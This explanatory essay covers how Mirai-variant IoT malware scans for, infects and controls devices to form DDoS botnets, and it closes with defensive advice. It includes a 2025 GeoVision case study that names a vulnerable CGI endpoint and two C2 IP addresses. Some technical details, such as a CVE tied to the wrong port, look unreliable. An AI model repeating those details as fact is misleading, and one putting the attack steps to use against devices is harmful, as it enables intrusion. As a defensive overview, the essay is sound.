The proliferation of Internet of Things (IoT) devices has reshaped connectivity but also created a fertile ground for cybercriminals to exploit. IoT malware, such as Mirai and its variants, leverages the vulnerabilities inherent in these devices to form large-scale botnets—networks of compromised devices controlled remotely for malicious purposes, primarily Distributed Denial of Service (DDoS) attacks, cryptojacking, and data theft. Since its emergence in 2016, Mirai has become a blueprint for IoT botnets, with its open-source code spawning numerous derivatives like Satori, Okiru, and CatDDoS. This essay explores the mechanisms by which IoT malware forms large-scale botnets, focusing on infection vectors, propagation, command-and-control (C2) infrastructure, and evasion tactics. It also provides a critical example to illustrate their real-world impact, drawing on 2025 cybersecurity trends and insights from web sources and X posts.

Mechanisms of Large-Scale Botnet Formation

IoT malware like Mirai variants forms botnets through a systematic process that exploits the weak security of IoT devices, scales rapidly, and maintains resilience. Below are the key mechanisms:

1. Scanning for Vulnerable Devices

Mirai’s botnet formation begins with continuous, wide-ranging scans of the internet to identify vulnerable IoT devices. These scans target devices with open ports, particularly:

• Telnet Ports (23, 2323): Commonly used for remote administration, these ports expose devices to brute-force attacks. Mirai scans for devices with default or weak credentials, such as “admin/admin.”
  
  
• HTTP/HTTPS Ports (80, 443, 8080, 8443): Used for web interfaces, these ports allow attackers to exploit vulnerabilities in device firmware.
  
• Other Ports: Variants like Satori target ports associated with specific vulnerabilities, such as port 7547 for SOAP-based router exploits (CVE-2017-17215).
  

Mirai’s scanning is efficient, probing thousands of IP addresses per second to maximize discovery. Devices running Linux-based operating systems, especially ARC processors, are prime targets due to their prevalence in IoT ecosystems (e.g., routers, IP cameras, DVRs).

Botnet Impact: This aggressive scanning ensures a rapid accumulation of potential bots, enabling botnets to grow to hundreds of thousands of devices, as seen with Mirai’s peak of 600,000 infections in 2016.

2. Infection via Credential Attacks and Exploits

Once a vulnerable device is identified, Mirai infects it through:

• Brute-Force Credential Attacks: Mirai attempts to log in using a hardcoded list of 61–64 common default username/password combinations (e.g., “root/12345”). If successful, it deploys the malware payload. This method exploits consumer neglect, as many users fail to change factory settings.
  
  
• Vulnerability Exploitation: Modern Mirai variants, like CatDDoS, exploit known vulnerabilities, such as CVE-2024-6047 in GeoVision devices or CVE-2020-10173 in Comtrend routers. These exploits allow remote code execution without credentials.
  
  
• Command Injection: Variants like Satori and Mukashi use command injection flaws (e.g., CVE-2020-9054 in Zyxel devices) to execute malicious scripts.
  

Upon infection, the malware downloads a binary tailored to the device’s architecture (e.g., ARM, MIPS, x86), ensuring compatibility across diverse IoT platforms.

Botnet Impact: The dual approach of credential attacks and exploits maximizes infection rates, creating a diverse botnet capable of scaling to millions, as seen with Bashlite’s estimated one million enslaved devices.

3. Malware Deployment and Self-Propagation

After infection, Mirai transforms the device into a bot by:

• In-Memory Execution: Mirai resides in volatile memory, avoiding disk writes to evade file-based detection. A simple reboot clears the infection, but reinfection is likely if vulnerabilities persist.
  
  
• Self-Deletion and Concealment: The malware deletes itself from the filesystem, alters its process name to a random string, and hides from process lists to avoid detection.
  
• Competition Blocking: Mirai kills processes associated with competing malware or botnets, ensuring exclusive control of the device.
  
  
• Self-Propagation: Infected devices scan for new targets, creating a self-sustaining infection cycle. Each bot acts as a scanner and infector, exponentially growing the botnet.
  

Botnet Impact: Self-propagation enables rapid botnet expansion, with variants like Reaper compromising devices faster than the original Mirai.

4. Command-and-Control (C2) Infrastructure

The botnet’s coordination relies on a robust C2 infrastructure:

• Centralized C2: In traditional Mirai botnets, infected devices report to a central C2 server, which issues commands for DDoS attacks, updates, or new scans.
  
  
• Peer-to-Peer (P2P) C2: Advanced variants use P2P architectures, where bots communicate directly, eliminating single points of failure. Examples include Trojan.Peacomm-inspired Mirai variants.
  
• Domain Generation Algorithms (DGAs): Mirai variants generate dynamic domains for C2 servers, evading domain blacklisting.
  
• Cloud-Based C2: Attackers leverage trusted cloud platforms like Azure to host C2 servers, blending with legitimate traffic.
  

Commands include launching DDoS attacks (e.g., HTTP floods, UDP floods, SYN floods), cryptojacking, or proxying malicious traffic.

Botnet Impact: A resilient C2 infrastructure ensures the botnet remains operational, even under mitigation efforts, enabling attacks like the 1.44 PB Mirai assault in 2024.

5. Scaling Through IoT Ecosystem Vulnerabilities

The IoT ecosystem’s inherent weaknesses fuel botnet growth:

• Weak Security: Many IoT devices lack robust security, with unencrypted firmware, open ports, and no auto-update mechanisms.
  
  
• Default Credentials: Manufacturers ship devices with predictable credentials, which users rarely change.
  
  
• Legacy Vulnerabilities: Unpatched devices remain exploitable for years, as seen with CVE-2017-17215 in Huawei routers.
  
• Device Proliferation: With over 17 billion IoT devices online in 2025, projected to reach 29 billion by 2030, the attack surface is vast.
  
• Homogeneous Platforms: Similar Linux-based architectures across devices simplify malware cross-compilation.
  
  

Botnet Impact: These vulnerabilities enable botnets to scale to unprecedented sizes, with Mirai variants like Wicked targeting diverse devices, from routers to CCTV-DVRs.

6. Evasion of Detection

Mirai variants employ tactics to avoid detection:

• Polymorphic Code: Variants like LZRD alter their code structure to evade signature-based antivirus.
  
• Encrypted Traffic: C2 communications use HTTPS or DNS tunneling, mimicking legitimate traffic.
  
• Low-Profile Attacks: Some variants launch low-volume HTTP floods to test capabilities without triggering alerts.
  
• Anti-Forensic Measures: Mirai wipes competing malware and clears logs to obscure its presence.
  

Botnet Impact: Evasion ensures botnets remain active, contributing to their longevity and scale, as seen with SYLVEON’s persistence in Taiwan.

Impacts of IoT Botnets

Large-scale IoT botnets have profound consequences:

• DDoS Attacks: Overwhelm targets with traffic, as seen in the 1 Tbps attack on OVH in 2016.
  
• Financial Losses: Downtime and mitigation cost organizations millions, with DDoS attacks averaging $1.6 million per incident in 2024.
  
• Data Theft: Botnets proxy traffic for phishing or credential stuffing, fueling identity theft.
• Cryptojacking: Satori variants mine cryptocurrencies, draining device resources.
  
• Infrastructure Disruption: Attacks on DNS providers like Dyn in 2016 crippled major websites.
  
• Regulatory Risks: Breaches violate regulations like GDPR or India’s DPDPA, risking fines.

These impacts highlight the urgency of securing IoT ecosystems.

Case Study: The 2025 GeoVision Mirai Variant Attack

A critical example of IoT malware forming a large-scale botnet is the 2025 Mirai variant attack targeting GeoVision IoT devices, reported by Akamai’s SIRT in April 2025.

Background

This campaign exploited command injection vulnerabilities (CVE-2024-6047, CVE-2024-11120) in discontinued GeoVision devices, such as IP cameras and DVRs, to deploy a Mirai-based botnet named “LZRD.” The attack surfaced in Akamai’s honeypots, marking the first active exploitation of these flaws since their disclosure in 2024.

Attack Mechanics

1. Scanning: The botnet scanned for GeoVision devices with vulnerable /DateSetting.cgi endpoints, targeting HTTP ports.
   
2. Infection: Exploiting CVE-2024-6047, attackers injected commands to download an ARM-based Mirai binary (“boatnet”) from a C2 server (176.65.144.253). The binary was executed with chmod 777 permissions.
   
3. Self-Propagation: Infected devices scanned for additional vulnerable GeoVision and TBK DVR devices, using brute-force Telnet attacks and other exploits (e.g., DigiEver flaws).
   
4. C2 Communication: The botnet used a hardcoded C2 IP (209.141.44.28) for commands, supporting DDoS attacks like UDP floods, TCP SYN floods, and HTTP floods.
   
5. Evasion: The LZRD variant employed polymorphic code and killed competing processes, evading antivirus detection.
   
6. Botnet Scale: The campaign compromised thousands of devices globally, with significant activity in Asia and North America, forming a botnet capable of volumetric DDoS attacks.
   

Response and Impact

Akamai published IOCs, Snort rules, and Yara signatures to aid defenders. Organizations were urged to patch devices, disable Telnet, and change default credentials. The attack disrupted corporate networks, with DDoS traffic affecting online services. In India, vulnerable GeoVision devices in smart cities risked infrastructure outages. Financial losses included mitigation costs and potential ransom demands, while stolen credentials fueled dark web sales. The campaign highlighted the persistence of Mirai variants, exploiting unpatched legacy devices.

Lessons Learned

• Patch Management: Apply firmware updates to close vulnerabilities like CVE-2024-6047.
• Credential Security: Replace default passwords with strong, unique ones.
  
• Network Segmentation: Isolate IoT devices to limit propagation.
  
• Threat Intelligence: Monitor IOCs to detect Mirai activity early.
  
• Device Retirement: Replace unsupported devices to avoid exploitation.

Mitigating IoT Botnets

To counter IoT malware and botnets, organizations and users should:

1. Secure Credentials: Change default usernames and passwords, using random password generators.
   
2. Patch Devices: Apply firmware updates promptly to address vulnerabilities.
   
3. Disable Remote Access: Block Telnet and UPnP to prevent unauthorized access.
   
   
4. Network Segmentation: Isolate IoT devices from critical systems.
   
5. Deploy Anti-Malware: Use tools to detect and remove botnet malware.
   
6. Monitor Traffic: Inspect HTTP/HTTPS and Telnet traffic for scanning or C2 activity using tools like Zeek.
   
7. Use Threat Intelligence: Leverage services to track Mirai variants and IOCs.
   
8. Reboot Devices: Clear in-memory malware, though reinfection requires addressing vulnerabilities.
   

Conclusion

IoT malware like Mirai variants forms large-scale botnets by scanning for vulnerable devices, infecting them via credential attacks and exploits, deploying self-propagating malware, and coordinating through resilient C2 infrastructure. Exploiting IoT ecosystem weaknesses—weak security, default credentials, and device proliferation—these botnets scale to millions, enabling devastating DDoS attacks, cryptojacking, and data theft. The 2025 GeoVision attack, leveraging Mirai’s LZRD variant, exemplifies their impact, compromising thousands of devices for DDoS campaigns. As IoT devices grow to 29 billion by 2030, securing credentials, patching vulnerabilities, and segmenting networks are critical to mitigate botnet threats. By addressing these vulnerabilities, organizations and users can disrupt the formation of large-scale botnets and protect the digital ecosystem in 2025 and beyond.